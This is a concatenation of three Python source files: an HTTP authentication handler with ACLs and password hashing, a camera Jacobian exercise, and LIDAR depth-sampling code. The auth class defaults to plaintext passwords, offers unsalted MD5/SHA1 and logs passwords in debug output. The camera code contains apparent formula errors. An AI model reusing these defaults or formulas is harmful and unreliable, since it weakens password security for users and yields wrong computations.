if callable(getattr(new_class, m)) \
and m.startswith(prefT):
ptype = m[len(prefT):]
if hasattr(new_class, '{}{}'.format(prefV, ptype)):
pwd_types.append(ptype)
super().__setattr__(new_class, '_supported_hashes', pwd_types)
for key, value in attrs.items():
new_val = new_class.__check_attr(key, value)
if new_val is not value:
setattr(new_class, key, new_val)
return new_class
def __setattr__(self, key, value):
new_val = self.__check_attr(key, value)
# super() doesn't work here in python 2, see:
# https://github.com/PythonCharmers/python-future/issues/267
super(BaseAuthHTTPRequestHandlerMeta, self).__setattr__(
key, new_val)
def __check_attr(cls, key, value):
def is_none(val):
return val is None
def is_one_of(val, sequence):
return val in sequence
def is_any_true(val, checkers):
for c in checkers:
if c(val):
return True
return False
transformer = {
'_can_create_users': OrderedDict,
}
requirements = {
'_JSON_params': (is_any_true, [is_none, is_seq_like]),
'_pwd_type': (is_one_of, cls._supported_hashes),
'_secrets': (is_any_true, [is_seq_like, is_map_like]),
'_can_create_users': (is_any_true, [is_map_like]),
'_pwd_min_len': (isinstance, int),
'_pwd_min_charsets': (isinstance, int),
'_is_SSL': (isinstance, bool),
'_cookie_name': (is_any_true, [is_str]),
'_cookie_len': (isinstance, int),
'_cookie_lifetime': (isinstance, (int, type(None))),
'_SameSite': (is_one_of, [None, 'lax', 'strict']),
'_jwt_lifetime': (isinstance, int),
'_send_new_refresh_token': (isinstance, bool),
'_refresh_token_lifetime': (isinstance, int),
'_refresh_token_len': (isinstance, int),
}
if key in transformer:
try:
value = transformer[key](value)
except (ValueError, TypeError):
raise TypeError('{} cannot be converted to {}'.format(
key, transformer[key].__name__))
if key in requirements:
checker, req = requirements[key]
if not checker(value, req):
raise TypeError('{} must be {}{}'.format(
key,
'one of ' if isinstance(req, list) else '',
req))
if key == '_pwd_type':
if value is not None and value.endswith('crypt'):
try:
unix_hash
except NameError:
raise ImportError(
'The passlib module is required for '
'unix hashes (*crypt)')
if value == 'bcrypt':
try:
import bcrypt
except ImportError:
raise ImportError(
'The bcrypt module is required for '
'bcrypt hashes')
elif value == 'scrypt':
try:
import scrypt
except ImportError:
raise ImportError(
'The scrypt module is required '
'for scrypt hashes')
return value
class BaseAuthHTTPRequestHandler(
with_metaclass(BaseAuthHTTPRequestHandlerMeta,
BaseHTTPRequestHandler, object)):
'''Implements authentication in an abstract way
Incomplete, must be inherited, and the child class must define
methods for storing/getting/updating users and sessions as well as
creating and sending tokens.
Class attributes:
- _JSON_params: a list of keys to send with every JSON response.
If any have not been set, they will be set as None (null).
Default is None, meaning do not send a JSON response (but an
HTML one)
- _secrets: can be either:
1) A simple filter: an iterable of absolute or relative paths
which require authentication:
- A path filter that begins with / is matched at the
beginning of the request path and must match until the end
or until another /
- Otherwise, the path filter is matched as a path component
(i.e. following a /) and again must match until the end
or until another /
- If no value in the list of path filters matches the
requested path, then anyone is granted access. Otherwise,
only authenticated users are granted access.
2) A more fine-grained filter: an OrderedDict (or equivalently,
a list of two-item tuples) where each key is a regex for
{method} {path} and each value is a list of allowed users or
roles (prefixed with '#').
A user is one of:
- a literal username, optionally preceded by '!' (to
negate or deny access)
- None (anyone, including unauthenticated)
- '*' (any authenticated user)
A role is a literal role name prefixed by '#', e.g. '#admin',
optionally preceded by '!' (to negate access).
- If no value in the list of secret path regexes matches the
requested path, then anyone is granted access. Otherwise,
the first (in order) regex that matched the requested path
determines if the user is allowed or not:
- It is allowed explicitly if {user} is given in the list
of users or #{role} is given for any of the user's roles
- It is denied explicitly if !{user} is given in the list
of users or !#{role} is given for any of the user's roles
- It is denied implicitly if the user is not in the list
and neither is '*' or None, and neither is any of their
roles.
- Checks are in the following order:
- Allowed implicitly by None (unauth)
- Allowed explicitly by username
- Denied explicitly by username
- Allowed explicitly by role
- Denied explicitly by role
- Allowed implicitly by *
- Denied implicitly (none of the above)
Example:
_secrets = [
# all authenticated users, except service, can access /foo
('^[A-Z]+ /foo(/|$)', ['*', '!service']),
# only users in the admin group can POST (POST /foo is
# still allowed for all other than service
('^POST ', ['#admin']),
# anyone can fetch /bar
('^GET /bar(/|$)', [None]),
# require authentication for all other pages
('.*', ['*']),
]
Default _secrets is [], i.e. no authentication required.
- _can_create_users: A dictionary, where every key is a user role
(<new_role>) and every value is a list of users or roles
(prefixed with '#') who are able to register users with role
<new_role>. As in _secrets, a username or role can be negated
with '!'.
- The role None as a key means the new user is assigned no
roles.
None and '*' in the list have the same meaning as explained in
_secrets.
- When a new user is to be registered with a set of roles, the
currently logged in user should be authorized to create users of
each of the given roles. Note that access to the /register
endpoint still needs to be granted via _secrets.
- Unlike _secrets, the keys (roles) are not regular expressions,
but comapred for literal equality. Also, if a user is to be
created with a role that isn't listed in _can_create_users,
access is denied, i.e. _can_create_users should list all
allowed roles and who is allowed to create users of that role.
Example:
_can_create_users = {
None: [None], # self-register with no role assignment
'service': ['admin'], # admins can create service accounts
'admin': ['admin'], # admins can create other admins
}
Default _can_create_users is {None: [None]}, i.e. self-register.
- _pwd_min_len: Minimum length of passwords. Default is 10.
- _pwd_min_charsets: Minimum number of character sets in
passwords. Default is 3.
- _pwd_type: the type (usually hash algorithm) to store passwords
in. Supported values are:
unsalted ones:
md5, sha1, sha256, sha512
salted ones (UNIX passwords):
md5_crypt, sha1_crypt, sha256_crypt, sha512_crypt, bcrypt,
scrypt
If a child class wants to extend these, it should define
_transform_password_{type} and _verify_password_{type}.
Default is None (plaintext).
- _prune_sessions_every: Minumum number of seconds, before we will
search for and remove expired sessions. It is checked before
every request, so if it is 0, then old sessions are searched for
before every request. If it is None, we never search for old
sessions. Either way, we check if the requested session is
expired either way, and if it is, it remove it.
'''
_JSON_params = None
_secrets = []
_can_create_users = {None: [None]}
_pwd_min_len = 10
_pwd_min_charsets = 3
_pwd_type = None
_prune_sessions_every = 0
__last_prune = curr_timestamp()
_endpoints = endpoints.Endpoint(
register={
'$allowed_methods': {'POST'},
},
changepwd={
'$allowed_methods': {'POST'},
},
login={
'$allowed_methods': {'POST'},
},
logout={
'$allowed_methods': {'GET', 'POST'},
},
)
def __init__(self, *args, **kwargs):
# parent's __init__ must be called at the end, since
# SimpleHTTPRequestHandler's __init__ processes the request
# and calls the handlers
if self.__class__._prune_sessions_every is not None:
next_check = self.__class__._prune_sessions_every \
+ self.__class__.__last_prune
if next_check <= curr_timestamp():
self.prune_old_sessions()
self.__class__.__last_prune = curr_timestamp()
super().__init__(*args, **kwargs)
################### Methods specific to authentication type
def get_current_token(self):
'''Should return the current token
Child class should implement
'''
raise NotImplementedError
def set_session(self, session):
'''Should ensure the token is sent in the response
Child class should implement
'''
raise NotImplementedError
def unset_session(self, session):
'''Should ensure the token is cleared client-side
session is guaranteed to exist
Child class should implement
'''
raise NotImplementedError
@classmethod
def generate_session(cls, user):
'''Should return a new Session
Child class should implement
'''
raise NotImplementedError
################### Methods specific to storage type
@classmethod
def find_session(cls, token):
'''Should return the Session corresponding to the token
Child class should implement
'''
raise NotImplementedError
@classmethod
def get_all_sessions(cls):
'''Should return a list of Sessions
Child class should implement
'''
raise NotImplementedError
@classmethod
def add_session(cls, session):
'''Should record the Session
Child class should implement
'''
raise NotImplementedError
@classmethod
def rm_session(cls, session):
'''Should delete the Session
session is guaranteed to exist
Child class should implement
'''
raise NotImplementedError
@classmethod
def find_user(cls, username):
'''Should return the User for that username
Child class should implement
'''
raise NotImplementedError
@classmethod
def create_user(cls, username, password, roles=None):
'''Should create and return a new User
Child class should implement
'''
raise NotImplementedError
@classmethod
def update_user(cls, user):
'''Called after changing user's attributes
Should perform any necessary post-update actions
Child class should implement
'''
raise NotImplementedError
def send_response_auth(self, error=None):
'''Sends the response to a one of our endpoints
- If error is given, it must be a tuple of (code, message)
- If the _JSON_params class attribute is set, we call
send_as_json (if error is given the message is sent as an
"error" key). TODO customise the error key?
- Otherwise we call send_response_goto
'''
if self.__class__._JSON_params is not None:
for k in self.__class__._JSON_params:
if k not in self.saved_params():
self.save_param(k, None)
self._send_response_auth_json(error)
else:
self._send_response_auth_plain(error)
def _send_response_auth_plain(self, error):
if error is not None:
self.send_error(code=error[0], explain=error[1])
else:
self.send_response_goto()
def _send_response_auth_json(self, error):
code = 200
if error is not None:
self.save_param('error', error[1])
code = error[0]
self.send_as_json(code=code)
def denied(self):
'''Returns 401 if resource is secret and no authentication'''
requested = '{} {}'.format(self.command, self.pathname)
secrets = self.__class__._secrets
try:
secrets = OrderedDict(self.__class__._secrets)
except ValueError:
requested = self.pathname
secrets = OrderedDict([(
('(^|/)'
'{}' # secrets joined in an OR
'(/|$)'.format('|'.join(secrets))),
['*'])])
if self.pathname != '{}/login'.format(self.endpoint_prefix) \
and self.pathname != '{}/logout'.format(
self.endpoint_prefix) \
and not self.is_authorized(
requested, secrets, default=True, is_regex=True):
return (401,)
return super().denied()
def is_authorized(
self, val, acl_map, default=False, is_regex=True):
'''Returns True or False if val is allowed by acl_map
- acl_map is a dict-like reference--list of user/roles pairs.
- val is the value to be compared to each key in acl_map.
- If is_regex is True, then reference is a regex for val,
otherwise equality is checked.
'''
def is_equal(ref, val):
return (ref is None and val is None) or ref == val
logger.debug('Checking authorization for {}'.format(val))
user = None
session = self.get_current_session()
if session is not None:
user = session.user
if is_regex:
comparator = re.search
else:
comparator = is_equal
for ref, acls in acl_map.items():
logger.debug('{} is allowed for {}'.format(ref, acls))
if comparator(ref, val):
if None in acls:
logger.debug('Anyone allowed')
return True
if user is None:
logger.debug('Unauth denied')
return False
if '!{}'.format(user.username) in acls:
logger.debug('Explicitly denied')
return False
if user.username in acls:
logger.debug('Explicitly allowed')
return True
for r in user.roles:
if '!#{}'.format(r.name) in acls:
logger.debug('Explicitly denied by role')
return False
if '#{}'.format(r.name) in acls:
logger.debug('Explicitly allowed by role')
return True
if '*' in acls:
logger.debug('Implicitly allowed')
return True
logger.debug('Implicitly denied')
return False
logger.debug('No match, defaulting to {}'.format(default))
return default
def get_current_session(self):
'''Returns the current Session if still valid
If it has expired, it removes it and returns None.
This implementation relies on the session token in the request
being saved by us. For authentication schemes which rely on
stateless tokens (e.g. JWT), override this method and return
a Session with a None token (but valid User and expiry).
'''
session = self.find_session(self.get_current_token())
if session is None:
logger.debug('No session')
return None
if session.has_expired():
logger.debug('Session {} has expired'.format(
session.token))
self.rm_session(session)
self.unset_session(session)
return None
logger.debug('Found session for {}'.format(
session.user.username))
return session
def expire_current_session(self):
'''Invalidates the session server-side'''
session = self.get_current_session()
if session is None or session.token is None:
return
self.rm_session(session)
self.unset_session(session)
def new_session(self, user):
'''Invalidates the old session and generates a new one'''
self.expire_current_session()
session = self.generate_session(user)
if session.expiry:
logger.debug('Session {} expires at {}'.format(
session.token, session.expiry))
self.add_session(session)
self.set_session(session)
return session
@classmethod
def load_users_from_file(cls, userfile, plaintext=True):
'''Adds users from the userfile
- userfile can be a string (filename) or a file handle
- The file contains one username:password[:roles] per line.
- If roles is given, it is comma-separated
- Neither username, nor password can be empty.
- If plaintext is True, then the password is checked against
the policy and hashed according to the _pwd_type class
attribute; otherwise it is saved as is (the hashing
algorithm must correspond to _pwd_type)
'''
def process_line(line):
def unpack(a, b, c, *d): # python 2
return a, b, c
user, pwd, roles = unpack(*'{}::'.format(
line.rstrip('\r\n')).split(':'))
return (user, pwd, [r.strip(' ')
for r in roles.split(',') if r != ''])
with open_path(userfile) as (ufile, _):
for line in ufile:
username, password, roles = process_line(line)
try:
cls.new_user(username, password, roles=roles,
plaintext=plaintext)
except (UserAlreadyExistsError, InvalidUsernameError,
BadPasswordError) as e:
logger.error('{}'.format(str(e)))
@classmethod
def prune_old_sessions(cls):
'''Removes expired sessions'''
logger.debug('Pruning old sessions')
sessions = cls.get_all_sessions()
for s in sessions:
if s.has_expired():
logger.debug('Removing session {}'.format(s.token))
cls.rm_session(s)
@classmethod
def new_user(
cls, username, password, roles=None, plaintext=True):
'''Creates a user with the given password and roles
- If plaintext is True, then the password is checked against
the policy and hashed according to the _pwd_type class
attribute; otherwise it is saved as is (the hashing
algorithm must correspond to _pwd_type)
Returns the new user.
'''
if not username:
raise InvalidUsernameError(username)
if cls.find_user(username):
raise UserAlreadyExistsError(username)
if plaintext:
if not cls.password_is_strong(password):
raise BadPasswordError(username)
password = cls.transform_password(password)
logger.debug('Creating user {}:{} (roles: {})'.format(
username, password, roles))
return cls.create_user(username, password, roles)
@classmethod
def change_password(
cls, user_or_username, password, plaintext=True):
'''Changes the password of username (no validation of current)
- user_or_username is an instance of User or a string
- If plaintext is True, then the password is checked against
the policy and hashed according to the _pwd_type class
attribute; otherwise it is saved as is (the hashing
algorithm must correspond to _pwd_type)
'''
user = user_or_username
if not isinstance(user, User):
user = cls.find_user(user)
if user is None:
raise NoSuchUserError(user.username)
if plaintext:
if not cls.password_is_strong(password):
raise BadPasswordError(user.username)
password = cls.transform_password(password)
logger.debug('Changing password for user {}:{}'.format(
user.username, password))
user.password = password
cls.update_user(user)
def authenticate(self):
'''Returns the User if successful login, otherwise None
username and password taken from request parameters
'''
username = self.get_param('username')
password = self.get_param('password')
user = self.find_user(username)
if user is None:
logger.debug('No such user {}'.format(username))
return None
if self.verify_password(user, password):
return user
return None
@classmethod
def verify_password(cls, user, password):
'''Returns True or False if user's password is as given
Uses the algorithm is given in _pwd_type (class attribute)
'''
if cls._pwd_type is None:
return user.password == password
verifier = getattr(
cls, '_verify_password_{}'.format(cls._pwd_type))
return verifier(plain=password, hashed=user.password)
@classmethod
def transform_password(cls, password):
'''Returns the password hashed according to the setting
Uses the algorithm is given in _pwd_type (class attribute)
'''
if cls._pwd_type is None:
return password
transformer = getattr(
cls, '_transform_password_{}'.format(cls._pwd_type))
return transformer(password)
@staticmethod
def _verify_password_md5_crypt(plain, hashed):
return unix_hash.md5_crypt.verify(plain, hashed)
@staticmethod
def _verify_password_sha1_crypt(plain, hashed):
return unix_hash.sha1_crypt.verify(plain, hashed)
@staticmethod
def _verify_password_sha256_crypt(plain, hashed):
return unix_hash.sha256_crypt.verify(plain, hashed)
@staticmethod
def _verify_password_sha512_crypt(plain, hashed):
return unix_hash.sha512_crypt.verify(plain, hashed)
@staticmethod
def _verify_password_bcrypt(plain, hashed):
return unix_hash.bcrypt.verify(plain, hashed)
@staticmethod
def _verify_password_scrypt(plain, hashed):
return unix_hash.scrypt.verify(plain, hashed)
@staticmethod
def _verify_password_md5(plain, hashed):
return hashlib.md5(
plain.encode('utf-8')).hexdigest() == hashed
@staticmethod
def _verify_password_sha1(plain, hashed):
return hashlib.sha1(
plain.encode('utf-8')).hexdigest() == hashed
@staticmethod
def _verify_password_sha256(plain, hashed):
return hashlib.sha256(
plain.encode('utf-8')).hexdigest() == hashed
@staticmethod
def _verify_password_sha512(plain, hashed):
return hashlib.sha512(
plain.encode('utf-8')).hexdigest() == hashed
@staticmethod
def _transform_password_md5_crypt(password):
return unix_hash.md5_crypt.hash(password)
@staticmethod
def _transform_password_sha1_crypt(password):
return unix_hash.sha1_crypt.hash(password)
@staticmethod
def _transform_password_sha256_crypt(password):
return unix_hash.sha256_crypt.hash(password)
@staticmethod
def _transform_password_sha512_crypt(password):
return unix_hash.sha512_crypt.hash(password)
@staticmethod
def _transform_password_bcrypt(password):
return unix_hash.bcrypt.hash(password)
@staticmethod
def _transform_password_scrypt(password):
return unix_hash.scrypt.hash(password)
@staticmethod
def _transform_password_md5(password):
return hashlib.md5(password.encode('utf-8')).hexdigest()
@staticmethod
def _transform_password_sha1(password):
return hashlib.sha1(password.encode('utf-8')).hexdigest()
@staticmethod
def _transform_password_sha256(password):
return hashlib.sha256(password.encode('utf-8')).hexdigest()
@staticmethod
def _transform_password_sha512(password):
return hashlib.sha512(password.encode('utf-8')).hexdigest()
@classmethod
def password_is_strong(cls, password):
'''Returns True or False if password conforms to policy'''
return (password is not None
and len(password) >= cls._pwd_min_len
and num_charsets(password) >= cls._pwd_min_charsets)
def do_register(self):
'''Creates a new user
Returns the user on success and None on failure
'''
username = self.get_param('username')
password = self.get_param('password')
roles = self.get_param('roles')
# for JSON requests roles could be a list already,
# otherwise accept a comma-separated string
if is_str(roles):
roles = [r.strip(' ') for r in roles.split(',')]
if roles is None:
roles = []
for r in roles:
if not self.is_authorized(
r,
self.__class__._can_create_users,
default=False,
is_regex=False):
self.send_response_auth(
error=(401,
('You cannot create '
'a user of role {}').format(r)))
return None
try:
user = self.new_user(username, password, roles)
except (UserAlreadyExistsError, InvalidUsernameError,
BadPasswordError) as e:
self.send_response_auth(error=(400, str(e)))
return None
self.new_session(user)
self.send_response_auth()
return user
def do_changepwd(self):
'''Changes the password for the given username
Returns the user on success and None on failure
'''
user = self.authenticate()
if user is None:
self.send_response_auth(
error=(401, 'Username or password is wrong'))
return None
new_password = self.get_param('new_password')
try:
self.change_password(user, new_password, plaintext=True)
except BadPasswordError as e:
self.send_response_auth(error=(400, str(e)))
return None
self.new_session(user)
self.send_response_auth()
return user
def do_login(self):
'''Issues a random cookie and saves it
Returns the user on success and None on failure
'''
user = self.authenticate()
if user is None:
self.expire_current_session()
self.send_response_auth(
error=(401, 'Username or password is wrong'))
return None
self.new_session(user)
self.send_response_auth()
return user
def do_logout(self):
'''Clears the cookie from the browser and saved sessions
Returns True
'''
self.expire_current_session()
self.send_response_auth()
return True
|
<reponame>linksdl/futuretec-project-self_driving_cars_projects
# imports
import numpy as np
import matplotlib
#matplotlib.use('wxagg') # change backend so that figure maximizing works on Mac as well
import matplotlib.pyplot as plt
class Camera:
'''Camera sensor class including measurement matrix'''
def __init__(self):
self.f_i = 2095.5 # focal length i-coordinate
self.f_j = 2095.5 # focal length j-coordinate
self.c_i = 944.9 # principal point i-coordinate
self.c_j = 640.2 # principal point j-coordinate
def get_hx(self, x):
# calculate nonlinear measurement expectation value h(x)
hx = np.zeros((2,1))
############
# TODO: implement and return h(x)
############
if x[0] == 0:
raise NameError('Jacobian not defined for x[0]=0!')
hx[0,0] = self.c_i - self.f_i * x[1]/x[0]
hx[1,0] = self.c_j - self.f_j * x[2]/x[1]
return hx
def get_H(self, x):
# calculate Jacobian H at current x from h(x)
H = np.matrix(np.zeros((2, 6)))
############
# TODO: implement and return H
############
if x[0] == 0:
raise NameError('Jacobian not defined for x[0]=0!')
H[0, 0] = self.f_i * x[1] / (x[0] * x[0])
H[1, 0] = self.f_j * x[2] / (x[0] * x[0])
H[0, 1] = self.f_i / x[0]
H[1, 2] = - self.f_j / x[0]
return H
def calc_Jacobian(x):
# calculate Jacobian for x
cam = Camera()
H = cam.get_H(x)
# init visualization
fig, (ax1, ax2) = plt.subplots(1,2)
plot_x = []
plot_y1 = []
plot_y2 = []
lin_y1 = []
lin_y2 = []
# calculate Taylor series expansion point
hx_orig = cam.get_hx(x)
ax1.plot(x[0], hx_orig[0], marker='x', color='green', label='expansion point x')
ax2.plot(x[0], hx_orig[1], marker='x', color='green', label='expansion point x')
# calculate linear approximation at this point
s1 = float(H[0,0]) # slope of tangent given by Jacobian H
s2 = float(H[1,0])
i1 = float(hx_orig[0] - s1*x[0]) # intercept i = y - s*x
i2 = float(hx_orig[1] - s2*x[0])
# calculate nonlinear measurement function h
for px in range(1,50):
x[0] = px
hx = cam.get_hx(x)
plot_x.append(px)
plot_y1.append(hx[0])
plot_y2.append(hx[1])
lin_y1.append(s1*px + i1)
lin_y2.append(s2*px + i2)
# plot results
ax1.plot(plot_x, plot_y1, color='blue', label='measurement function h')
ax1.plot(plot_x, lin_y1, color='red', label='linear approximation H')
ax2.plot(plot_x, plot_y2, color='blue', label='measurement function h')
ax2.plot(plot_x, lin_y2, color='red', label='linear approximation H')
# maximize window
mng = plt.get_current_fig_manager()
#mng.frame.Maximize(True)
# legend
ax1.legend(loc='center left', shadow=True, fontsize='large', bbox_to_anchor=(0.5, 0.1))
ax1.set_xlabel('x [m]')
ax1.set_ylabel('h(x) first component [px]')
ax2.legend(loc='center left', shadow=True, fontsize='large', bbox_to_anchor=(0.5, 0.1))
ax2.set_xlabel('x [m]')
ax2.set_ylabel('h(x) second component [px]')
plt.show()
#################
# define expansion point for Taylor series
x = np.matrix([[10],
[1],
[-1],
[0],
[0],
[0]])
calc_Jacobian(x)
|
<gh_stars>1-10
import sys
from PIL import Image
from pathlib import Path
import os
import shutil
import glob
import time
from dataloaders.kitti_loader import rgb_read
import cv2
import matplotlib.pyplot as plt
import numpy as np
"""
Choose samples from the gt (and not from vel, so we could have more options to samples from) and accumulate it.
Input:
current_pred_dir: the NNs prediction on the current phase images
depth_dir_path: velodyne from the current phase (based on the last phase predictions)
num_of_NN: the number of predictors
phase: current phase
budget: number of desired new samples
samp_method: PM or greedy (MAX)
metric: rmse or mae
is_test: True if we create maps for test set, otherwise False
save_probs_and_sample_maps: True if we want to save the probability maps (made from the variance map of all the predictions) & the new (only) sample maps - for debug & presentation
first_phase_rgbd: True if we are in K=1 & using rgbd input (the default is rgb only)
Outputs: None, beside saving the new velodyne_raw files for the next phase
"""
def create_custom_depth_maps(current_pred_dir, current_depth_dir, num_of_NN, phase, budget, samp_method, metric, is_test=False, save_probs_and_sample_maps=False, first_phase_rgbd=False):
if 'val_select' in current_pred_dir: # dealing with val_select
glob_d = "".join(current_depth_dir + '/depth_selection/val_selection_cropped/velodyne_raw/*.png') # velodyne from the current phase (based on last phase's predictions)
paths_d = sorted(glob.glob(glob_d))
glob_gt = '../data_new/phase_1/mini_set_1/depth_selection/val_selection_cropped/groundtruth_depth/*.png' # the gt aren't changing
paths_gt = sorted(glob.glob(glob_gt))
glob_d_pred = "".join(current_pred_dir + '/NN*/depth_selection/val_selection_cropped/velodyne_raw/*.png') # the NNs prediction on the current phase's images
paths_d_pred = sorted(glob.glob(glob_d_pred), key=lambda x: x.split('velodyne_raw/')[1]) # the sort makes sure same images in different NN* are arranged together
predictions = num_of_NN
num_different_images = int(len(paths_d_pred) / num_of_NN)
assert len(paths_d_pred) == len(paths_gt) * num_of_NN, "create_custom_depth_maps: there are not enough predictions per image for val_select"
elif is_test == False: # dealing with train
glob_d = "".join(current_depth_dir + '/data_depth_velodyne/train/*_sync/proj_depth/velodyne_raw/image_0[2,3]/*.png')
paths_d = sorted(glob.glob(glob_d))
glob_gt = "".join('../data_new/phase_1/mini_set_' + current_depth_dir.split('mini_set_')[1][0] + '/data_depth_annotated/train/*_sync/proj_depth/groundtruth/image_0[2,3]/*.png')
paths_gt = sorted(glob.glob(glob_gt))
glob_d_pred = "".join(current_pred_dir + '/NN*/data_depth_velodyne/train/*_sync/proj_depth/velodyne_raw/image_0[2,3]/*.png')
paths_d_pred = sorted(glob.glob(glob_d_pred), key=lambda x: x.split('train/')[1])
predictions = num_of_NN - 1
num_different_images = int(len(paths_d_pred) / (num_of_NN - 1))
assert len(paths_d_pred) == len(paths_gt) * (num_of_NN - 1), "create_custom_depth_maps: there are not enough predictions per image for train"
else: # dealing with test
glob_d = "".join(current_depth_dir + '/data_depth_velodyne/test/*_sync/proj_depth/velodyne_raw/image_0[2,3]/*.png')
paths_d = sorted(glob.glob(glob_d))
glob_gt = "".join('../data_new/phase_1/mini_set_1/data_depth_annotated/test/*_sync/proj_depth/groundtruth/image_0[2,3]/*.png')
paths_gt = sorted(glob.glob(glob_gt))
glob_d_pred = "".join(current_pred_dir + '/NN*/data_depth_velodyne/test/*_sync/proj_depth/velodyne_raw/image_0[2,3]/*.png')
paths_d_pred = sorted(glob.glob(glob_d_pred), key=lambda x: x.split('test/')[1])
predictions = num_of_NN
num_different_images = int(len(paths_d_pred) / num_of_NN)
assert len(paths_d_pred) == len(paths_gt) * num_of_NN, "create_custom_depth_maps: there are not enough predictions per image for test"
paths_d_pred_itr = iter(paths_d_pred)
for image in range(num_different_images):
predictions_of_same_image = [] # will be: [num_of_images][row][col]
for i in range(predictions):
predictions_of_same_image.append(depth_read(next(paths_d_pred_itr)))
# creating inputs for lidar_choose function
h, w = predictions_of_same_image[0].shape # should be 352x1216
reshaped_predictions_of_same_image = np.asarray([np.reshape(predictions_of_same_image[j], (h * w, 1)) for j in range(predictions)])
reshaped_predictions_of_same_image = (reshaped_predictions_of_same_image.squeeze(axis=2)).transpose() # shape should be: (h*w, predictions)
current_gt = depth_read(paths_gt[image]) # should be bigger than 352x1216 if train, else exactly 352x1216 (validation & test sets came from val_select_cropped)
m = current_gt.shape[0] - 352
n = int(round((current_gt.shape[1] - 1216) / 2.))
current_gt = current_gt[m:(m + 352), n:(n + 1216)]
if (phase == 1) and (not first_phase_rgbd): # no d inputs
valid_mask = np.reshape(current_gt.copy(), (h * w, 1)) # the whole gt samples are valid, changing to a vector
current_velodyne = np.zeros(current_gt.shape) # we don't have samples yet
else: # cropping, make sure we don't give option to sample pixels that we've already sampled, changing to a vector
current_velodyne = depth_read(paths_d[image]) # should be 352x1216 because our predictions are already cropped and we made the last velodyne to be the same shape as them
if first_phase_rgbd and current_velodyne.shape[0] != 352: # if first phase is RGBD so we just need to be sure the first d-maps (with 0 samples) are in the right shape
current_velodyne = np.zeros(current_gt.shape)
if phase > 1:
print("Create map: should not enter here after first phase")
exit()
assert current_velodyne.shape == current_gt.shape, "'create_custom_depth_maps' function: current_velodyne & current_gt shapes are different"
valid_mask = current_gt.copy()
valid_mask[current_velodyne > 0] = 0 # can be 0 or -1, lidar_choose doesn't care. if we have valid samples in velodyne we don't want to choose them again
valid_mask = np.reshape(valid_mask, (h * w, 1))
current_velodyne[current_velodyne <= 0] = 0 # keep only valid samples (pixels that are >=0)
if metric == 'rmse':
inds_to_sample_next, prob_only_valid_for_next_sampling, x = lidar_choose(reshaped_predictions_of_same_image, valid_mask.squeeze(), budget, 'var', samp_method)
elif metric == 'mae':
inds_to_sample_next, prob_only_valid_for_next_sampling, x = lidar_choose(reshaped_predictions_of_same_image, valid_mask.squeeze(), budget, 'median', samp_method)
else:
print("Wrong criterion, exiting...")
exit()
if inds_to_sample_next.size != 0: # we have samples
next_velodyne = np.reshape(np.zeros((h, w)), (h * w, 1)) # vector of zeros (non valid depth)
inds_to_sample_next = np.expand_dims(inds_to_sample_next, 0).transpose()
next_velodyne[inds_to_sample_next] = np.reshape(current_gt, (h * w, 1))[inds_to_sample_next]
next_velodyne = np.reshape(next_velodyne, (h, w))
next_velodyne = next_velodyne + current_velodyne # we want to add the previous samples
else: # we don't have (already took all valid samples), take current velodyne instead
next_velodyne = current_velodyne
if 'val_select' in current_pred_dir:
filename = current_pred_dir.split('/predictions_tmp_val_select')[0] + '/depth_selection' + paths_d_pred[((predictions) * image) + i].split('/depth_selection')[1]
else:
filename = current_pred_dir.split('/predictions_tmp')[0] + '/data_depth_velodyne' + paths_d_pred[((predictions) * image) + i].split('/data_depth_velodyne')[1]
os.makedirs(os.path.dirname(filename), exist_ok=True)
depth_write(filename, next_velodyne) # if we've opened with depth_read, we need to save with depth_write. This will be cropped
if save_probs_and_sample_maps == True: # to debug or look at the semi-results (only on mini-set 1)
if 'val_select' in current_pred_dir:
print("create_custom_depth_maps: save probs and sample maps of val_select is not available yet. Need to make some modifications. Continue without saving...")
continue
elif filename.split('set_')[1].split('/')[0] != '1': # we are saving only things in miniset-1
continue
next_velodyne[next_velodyne > 0] = 1
ps = paths_gt[image].split('/')
if is_test:
rgb_path = '/'.join(ps[:-7] + ['data_rgb'] + ps[-6:-4] + ps[-2:-1] + ['data'] + [ps[-1:][0].replace('groundtruth_depth', 'image')])
else:
rgb_path = '/'.join(ps[:-7] + ['data_rgb'] + ps[-6:-4] + ps[-2:-1] + ['data'] + ps[-1:])
x_only_gt_valid = np.reshape(x.copy(), (h, w)) # will be only valid
x_only_gt_valid[current_gt < 0] = 0
show_prob_map_and_sampling_indices_on_image(phase, rgb_path, next_velodyne, np.reshape(x / np.sum(x), (h, w)),
x_only_gt_valid, show_results=False, save_results=True) # if want the variance map, take x instead of x / np.sum(x)
"""
Chooses the next samples to be fed to the NN during train phase.
Input:
scores: shape - depth_samples_col_vec x num_sources depth predictions. the user should turn each depth samples image (the input to the NN) to a column vector
valid_mask: mask image of all relevant pixels to be chosen, as a vector. We don't want to choose points where either the value is not known or that were chosen already. >0 means valid (to choose), <=0 invalid.
budget: how many points to sample this time
method: two options: 'var', 'median'
pm_greedy - choose use the probability matching (sample based on the probability map), or the greedy (MAX - highest probabilities)
Output:
inds: Chosen indices.
prob: A map of the pixels probability (to be chosen).
x: the values related to the chosen method.
Example:
for total of 5 NN, meaning we compare 4 outputs to a single one: inds,prob,x = lidar_choose(scores, mask, budget=1024, method='var',
quantile_discard=[0.25,0.75], pm_greedy='pm')
"""
def lidar_choose(scores, valid_mask, budget, method, pm_greedy):
assert method in ['var', 'median'], "unknown method:" + method
assert pm_greedy in ['pm', 'greedy'], "unknown pm_greedy:" + pm_greedy
assert scores.shape[0] == valid_mask.shape[0], "scores.shape[0] != valid_mask.shape[0]"
assert np.all(scores >= 0.), "non-positive predictions found!"
n, k = scores.shape
scores = np.sort(scores, axis=1).astype('float32') # sort each cell (depth predictions of a pixel) from small to large value
if method == 'var': # relates to L2
x = np.var(scores, axis=1).astype('float32')
elif method == 'quantiles':
x = (scores[:, -1] - scores[:, 0]) ** 2
elif method == 'median': # relates to L1
med = np.median(scores, axis=1) # median of even array is a non existing element (the middle)
medians = np.transpose(np.tile(med, (scores.shape[1], 1)))
x = np.mean(np.absolute(scores - medians), axis=1)
else:
assert (1)
prob_only_valid = x.copy() # will contain cues where it's best to sample (based on the predictors)
# give zero prob to invalid points
bad_inds, = np.where(valid_mask <= 0)
good_inds = scores.shape[0] - bad_inds.shape[0] # something to sample from
prob_only_valid[bad_inds] = 0.
s = np.sum(prob_only_valid)
if budget > good_inds: # we want to sample more then we can
print("Warning: lidar_choose: taking {} instead of {} samples, because not enough valid pixels to sample from gt".format(good_inds, budget))
budget = good_inds
if budget == 0: # nothing to sample
prob_only_valid = np.array([]) # nothing is valid. We don't have valid prob map
